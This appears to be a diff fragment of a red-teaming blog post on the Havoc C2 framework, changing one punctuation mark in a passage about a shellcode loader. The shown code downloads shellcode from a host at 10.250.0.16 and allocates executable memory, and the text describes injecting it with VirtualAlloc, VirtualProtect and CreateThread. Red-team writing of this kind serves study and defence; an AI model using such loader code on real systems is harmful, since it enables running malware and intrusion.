yl-labs/yl-labs.github.io/_posts/2025-03-18-red-reaming-havoc-c2.md

     recvbuf = Download(L"10.250.0.16\0", std::stoi("8001"), L"/test.bin\0");
 ```

-* Then, with the help of multiple Windows API's such as `VirtualAlloc`, `VirtualProtect` and `CreateThread`, we inject the downloaded shellcode into the loader's process itself.
+* Then, with the help of multiple Windows API's such as `VirtualAlloc`, `VirtualProtect` and `CreateThread`; we inject the downloaded shellcode into the loader's process itself.

 ```
 LPVOID alloc_mem = VirtualAlloc(NULL, recvbuf.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);